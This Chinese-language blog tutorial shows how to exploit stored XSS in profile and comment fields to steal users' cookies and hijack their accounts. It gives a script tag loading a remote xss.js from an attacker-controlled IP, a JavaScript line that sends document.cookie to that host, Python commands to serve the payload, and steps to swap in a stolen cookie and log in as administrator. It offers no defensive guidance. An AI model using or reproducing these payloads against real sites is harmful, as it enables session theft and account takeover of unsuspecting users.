相关阅读
视频讲解
本期视频将讲解如何利用XSS漏洞,譬如通过个人中心、留言板可以存储的XSS漏洞,来读取用户的cookie并传入为我们的服务器,这样我们就可以接管用户的账户了!
图文讲解
在渗透测试过程中,我们通常会发现个人中心、评论留言的地方可以尝试进行XSS攻击
<script>alert("1")</script>
![图片[1]-XSS攻击如何利用?-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/11/20221111003302790.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后保存后,进行访问
![图片[2]-XSS攻击如何利用?-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/11/20221111003341354-1024x573.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
发现弹窗了
![图片[3]-XSS攻击如何利用?-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/11/20221111003410831.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
很多用户到上面这一步就不知道该怎么做了,接下来我们看看应该如何利用呢?
10.10.14.13这里是我们服务器内网的ip地址
<script src="http://10.10.14.13/xss.js">
xss.js文件我们可以尝试读取用户的cookie
document.write('<img src="http://10.10.14.13/?'+document.cookie+'">');
![图片[4]-XSS攻击如何利用?-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/11/20221111003507117-1024x571.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
现在,我们需要做的是将刚才的xss文件托管在10.10.14.13上,通常情况下,我们只需要启动一个python服务就好了
如果你使用的是Python2,可以运行下面的命令
python -m SimpleHTTPServer 80
如果你使用的是Python3,可以运行下面的命令
python -m http.server 80
启动完成后,我们只需要等待用户访问我们的个人主页,我们就可以随时接管他的账户了
![图片[5]-XSS攻击如何利用?-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/11/20221111005135946-1024x578.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
这里我们看到Cookie传过来了
![图片[6]-XSS攻击如何利用?-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/11/20221111005219306-1024x576.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们只需要回到之前的页面,右键检查
![图片[7]-XSS攻击如何利用?-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/11/20221111005252964-1024x491.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
修改Storage中的Cookie值
![图片[8]-XSS攻击如何利用?-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/11/20221111005313192-1024x571.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
![图片[9]-XSS攻击如何利用?-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/11/20221111005448171-1024x574.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后刷新页面,我们可以看到,现在已经是以管理员身份登录了站点
![图片[10]-XSS攻击如何利用?-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/11/20221111005527765-1024x570.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
至此结束,我们发现可以通过上述方式获取到用户的cookie从而接管用户的账户,这也是xss攻击常见的利用方式之一。
© 版权声明
THE END
- 最新
- 最热
只看作者